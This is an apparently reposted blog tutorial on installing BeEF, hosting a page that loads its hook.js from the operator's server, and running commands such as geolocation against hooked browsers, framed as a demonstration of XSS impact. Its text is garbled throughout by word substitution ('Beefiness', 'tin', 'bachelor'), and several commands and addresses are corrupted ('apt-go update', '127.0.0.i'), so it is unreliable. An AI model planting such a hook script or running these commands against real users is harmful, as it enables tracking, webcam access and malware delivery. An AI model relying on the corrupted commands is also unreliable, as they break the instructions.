How to Make Custom Beef Hook Page
(Annotation: If you'd like a LOT more detail then have a look at my Pluralsight course on Beefiness - a free 10 day trial volition give y'all access)
Cross Site Scripting (XSS) is a vulnerability affecting web pages that allow code to be injected into them from an unauthorised third party. If this vulnerability exists in a website and so an attacker may exist able to execute code in the browser belonging to other users of that website.
XSS can be an underrated problem, often when we testify the existence of XSS we use a simple piece of JavaScript that shows a dialog box. The simplicity of showing a dialog box hides the implications of being able to run arbitrary JavaScript on another users browser. So how tin we highlight more conspicuously those implications?
Enter the Browser Exploitation Framework, or Beefiness for short.
BeEF has over 200 in built commands that prove the extent to which XSS tin impact a user and you can fifty-fifty add together your own commands. In this article we'll wait at using Beef to perform some basic commands.
Setting up BeEF
First a note on setting upwardly Beef. Installation on Kali Linux based systems is as simple equally:
apt-go update apt-get install beef-xss
For other Linux based installs information technology's worth looking at the installation guide on the Beefiness website
It's worth noting that it'southward not officially supported on Windows. From here on we're going to presume that we've used apt-get to install on Kali Linux.
Starting BeEF
To kickoff the service nosotros'll need to navigate to the directory where Beef lives:
cd /usr/share/beef-xss
From here we need to add a password before we can beginning the service, so we'll open the config.yaml file up and notice where we need to modify the countersign. Currently the username and countersign are both "beef". You can change both the username and password if yous similar, merely at a minimum, you need to change the password before the service volition start.
Once you lot save that we'll then be able to first Beef just past typing:
./beef
After a few seconds you'll see output to the screen to show the service has started and it will prove you lot the location of the script file you'll need for later and also the URL for the use interface that we'll use to interact with BeEF:
You'll annotation that the in a higher place image shows two different IP addresses, one is bachelor only to the local machine (127.0.0.1) and the other (10.0.2.15) is available to the network nosotros're attached to. We'll be using 127.0.0.1 for the purpose of this commodity, although in a real scenario yous'd want an internet facing accost.
Trying BeEF on Yourself
We're non going into the intricacies of injecting JavaScript into a page in this post, so instead nosotros're just going to create a web page that already has the Beef script in it. Below you'll see some HTML that contains a reference to the JavaScript that our Beef server is giving us to use, as detailed in the screenshot to a higher place:
<html> <head> <title> Case BeEF hooked page </championship> </head> <trunk> <p>This page should be running the hook script for BeEF</p> <script src="http://127.0.0.i:3000/hook.js"></script> </body> </html>
Create a new file:
nano /var/www/html/indexBeef.html
...and add together the in a higher place HTML to information technology.
Then start your local Apache spider web server with:
/etc/init.d/apache2 restart
Once that starts, use the browser to navigate to:
http://localhost/indexBeef.html
... to view the page, which will starting time the BeEF script and hook the browser. Again, in a real scenario, our BeEF folio would exist accessed past a user beyond the cyberspace, but we're using the local car here for demonstration purposes.
Logging in to the Beef User Interface
At this point our Beef server should now accept a connection to the browser running the script. The easiest way to check that is to login to the Beef user interface. This URL was given to us when we started the Beefiness service, in our case it was:
http://127.0.0.1:3000/ui/panel
Navigating to this gives us a login screen, then we need the username and password that we initially put into the config file.
Once we've logged in we'll have admission to the main admin screen, which should look something similar this:
There at the top left you can see we've got a browser listed every bit being online. That'southward our connection to the hooked browser.
At present that we've "hooked" a browser, what tin we exercise with it?
Running Commands Confronting a Hooked Browser
If we click on the hooked browser (as highlighted higher up) then we'll get some details about the browser and the motorcar it'south running on. Clicking on the command tab will requite us the commands available to us:
From there we can browse the available commands in the tree, or use the search box if we already know the name of the command we desire.
Commands are only using functionality available to us through JavaScript on the page, simply if you look at the commands you'll run across a huge wealth of possibilities, everything from attempting to apply an bachelor webcam to scanning the network visible to the hooked browser.
A expert example is the geolocation command which allows y'all to see where a browser is physically located. If we search for the geo command, cull one of the optional API'southward to aid with geolocation and execute information technology, we get a response like the following:
You tin see that the response gives us a concrete location. While I've blanked out some of the issue, I tin say that it gives a fairly accurate location, including latitude and longitude, along with useful data like a partial postcode and even my broadband provider.
Available commands tin potentially exercise all of the following and more:
- Interact with the DOM (change HTML on the page)
- Discover extensions
- Interact with a webcam
- Scan the customer network
- Assist with social technology, including getting users to download malicious files
Learning More About Beef
For a deeper dive into using Beef and how information technology works, accept a look at my Pluralsight grade "Getting started with Beefiness".
If y'all're not already signed upwardly to Pluralsight so you can get a free ten day trial here.
Hither'due south a teaser for the course:
Beef Project
Beefiness (Github)
Got a comment or correction (I'1000 not perfect) for this post? Please leave a comment below.
Source: https://www.gavinjl.me/getting-started-with-beef/
0 Response to "How to Make Custom Beef Hook Page"
Post a Comment